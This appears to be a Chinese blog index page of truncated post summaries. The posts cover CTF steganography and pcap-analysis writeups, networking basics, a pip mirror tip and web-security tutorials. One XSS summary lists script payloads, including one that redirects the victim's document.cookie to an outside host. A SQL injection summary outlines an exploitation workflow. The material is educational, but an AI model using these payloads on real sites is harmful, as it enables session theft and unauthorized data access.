摘要： 题目给了一个where_is_password.pcapng binwalk看到里面有个压缩包，利用foremost分离出来 压缩包需要密码 分析流量包，发现存在sql注入 提取出来进行url解码，可以看到利用二分法进行sql盲注 ascii有 128个所以从>64开始判断,返回用户名或密码错误，然 阅读全文

摘要： 1.简单隐写 ①Binwalk分析图片，发现有rar文件，用dd分离出来 ②提取的压缩包需要密码，尝试使用JPHS无密码得到一个txt文件 ![image](https://img2023.cnblogs.com/blog/1203983/202212/1203983-202212121459407 阅读全文

摘要： （1）背时 描述：腐烂了，变异了，太背时了...... 附件为一个压缩包 解题思路： 1.打开压缩包，发现有一个描述：v(51wA:I7uABi#Bx(T 2.将v(51wA:I7uABi#Bx(T进行Z85解密为c3npr_@aq_y0ir。 3.加密的lsb隐写，利用cloacked-pixel 阅读全文

摘要： 直接换源下载 #1. 设置超时时间，安装txt 文件内安装包 pip install -i https://pypi.tuna.tsinghua.edu.cn/simple --default-timeout=1000 -r packages.txt #2. 指定源安装，推荐清华源 pip inst 阅读全文

摘要： 1、 杂项 图片里面有什么 ，附件为一张图片 通过Binwalk查看发现有压缩包，通过foremost分离一下。 打开输出文件，发现里面有两个图片。 00000000.png是原图，00000722.png里面可能隐藏了信息。通过stegsolve打开图片查看。 发现Lsb隐写，将其另存为png文件 阅读全文

摘要： 路由 静态路由--通过静态路由学习和本路由器非直连的网段。 1.检测路由器和他的直连网段是否能ping通。 如图所示，AR1直连1.0和2.0网段，可以ping通直连他的客户机。 AR2直连2.0和3.0网段，可以ping通他的客户机。 2.如果PC1想要访问3.0网段，AR1与3.0网段没有直连， 阅读全文

摘要： 交换机基础 转发方式 泛洪：交换机把从某一个接口进来的帧转发给本交换机内同一VLAN内的其他所有接口； 转发：交换机把从某一个接口进来的帧转发给指定的某一个端口； 丢弃：交换机把从某一个接口接收到的帧直接丢弃。 MAC 地址表的概念： 当把电脑主机插到交换机接口之后，如果电脑主机开始发送数据，那么交 阅读全文

摘要： XSS攻击 点击查看代码 <script>alert('xss')</script> <script>alert(document.cookie)</script> #显示出cookie信息 <script>document.location='http://www.test.com/cookie. 阅读全文

摘要： import time import socket import threading def device_info(): ip_list = [] name_list = [] user_list = [] passwd_list = [] f = open('devices_list.txt', 阅读全文

摘要： SQL注入漏洞原理与利用 SQL注入漏洞流程 判断注入类型 判断字段个数 查询回显位 查询数据库名 查询表、字段名 查询内容 判断注入类型 1.数字型注入点判断 当要输入的参数x为数字型时，后端脚本中的SQL语句类型大致如下: select * from <表名> where id=x; 数字类型可 阅读全文